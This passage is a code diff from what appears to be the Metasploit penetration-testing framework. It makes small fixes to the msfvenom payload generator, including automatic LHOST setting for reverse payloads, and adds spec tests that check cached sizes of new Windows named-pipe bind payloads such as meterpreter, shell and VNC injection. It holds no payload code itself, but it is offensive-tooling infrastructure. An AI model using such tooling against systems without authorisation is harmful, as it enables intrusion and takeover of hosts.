datastore[k.upcase] = v.to_s
end
if opts[:payload].to_s =~ /[\_\/]reverse/ and datastore['LHOST'].nil?
init_framework
datastore['LHOST'] = Rex::Socket.source_address
end
end
@ -214,7 +225,7 @@ def payload_stdin
end
def dump_payloads
init_framework(:module_types => [ ::Msf::MODULE_PAYLOAD ])
init_framework(:module_types => [ :payload ])
tbl = Rex::Text::Table.new(
'Indent' => 4,
'Header' => "Framework Payloads (#{framework.stats.num_payloads} total)",
@ -232,7 +243,7 @@ def dump_payloads
end
def dump_encoders(arch = nil)
init_framework(:module_types => [ ::Msf::MODULE_ENCODER ])
init_framework(:module_types => [ :encoder ])
tbl = Rex::Text::Table.new(
'Indent' => 4,
'Header' => "Framework Encoders" + ((arch) ? " (architectures: #{arch})" : ""),
@ -255,7 +266,7 @@ def dump_encoders(arch = nil)
end
def dump_nops
init_framework(:module_types => [ ::Msf::MODULE_NOP ])
init_framework(:module_types => [ :nop ])
tbl = Rex::Text::Table.new(
'Indent' => 4,
'Header' => "Framework NOPs (#{framework.stats.num_nops} total)",
@ -277,7 +288,7 @@ begin
rescue HelpError => e
$stderr.puts e.message
exit(1)
rescue MsfVenomError, Msf::OptionValidateError => e
rescue MsfVenomError => e
$stderr.puts "Error: #{e.message}"
exit(1)
end

77
spec/modules/payloads_spec.rb
View File

@ -2643,6 +2643,17 @@ RSpec.describe 'modules/payloads', :content do
reference_name: 'windows/dllinject/bind_ipv6_tcp'
end
context 'windows/dllinject/bind_named_pipe' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'stagers/windows/bind_named_pipe',
'stages/windows/dllinject'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/dllinject/bind_named_pipe'
end
context 'windows/dllinject/bind_nonx_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
@ -2961,6 +2972,17 @@ RSpec.describe 'modules/payloads', :content do
reference_name: 'windows/meterpreter/bind_ipv6_tcp_uuid'
end
context 'windows/meterpreter/bind_named_pipe' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'stagers/windows/bind_named_pipe',
'stages/windows/meterpreter'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/meterpreter/bind_named_pipe'
end
context 'windows/meterpreter/bind_nonx_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
@ -3223,6 +3245,17 @@ RSpec.describe 'modules/payloads', :content do
reference_name: 'windows/patchupdllinject/bind_ipv6_tcp'
end
context 'windows/patchupdllinject/bind_named_pipe' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'stagers/windows/bind_named_pipe',
'stages/windows/patchupdllinject'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/patchupdllinject/bind_named_pipe'
end
context 'windows/patchupdllinject/bind_nonx_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
@ -3377,6 +3410,17 @@ RSpec.describe 'modules/payloads', :content do
reference_name: 'windows/patchupmeterpreter/bind_ipv6_tcp'
end
context 'windows/patchupmeterpreter/bind_named_pipe' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'stagers/windows/bind_named_pipe',
'stages/windows/patchupmeterpreter'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/patchupmeterpreter/bind_named_pipe'
end
context 'windows/patchupmeterpreter/bind_nonx_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
@ -3531,6 +3575,17 @@ RSpec.describe 'modules/payloads', :content do
reference_name: 'windows/shell/bind_ipv6_tcp'
end
context 'windows/shell/bind_named_pipe' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'stagers/windows/bind_named_pipe',
'stages/windows/shell'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/shell/bind_named_pipe'
end
context 'windows/shell/bind_nonx_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
@ -3735,6 +3790,17 @@ RSpec.describe 'modules/payloads', :content do
reference_name: 'windows/upexec/bind_ipv6_tcp'
end
context 'windows/upexec/bind_named_pipe' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'stagers/windows/bind_named_pipe',
'stages/windows/upexec'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/upexec/bind_named_pipe'
end
context 'windows/upexec/bind_nonx_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
@ -3889,6 +3955,17 @@ RSpec.describe 'modules/payloads', :content do
reference_name: 'windows/vncinject/bind_ipv6_tcp'
end
context 'windows/vncinject/bind_named_pipe' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'stagers/windows/bind_named_pipe',
'stages/windows/vncinject'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/vncinject/bind_named_pipe'
end
context 'windows/vncinject/bind_nonx_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [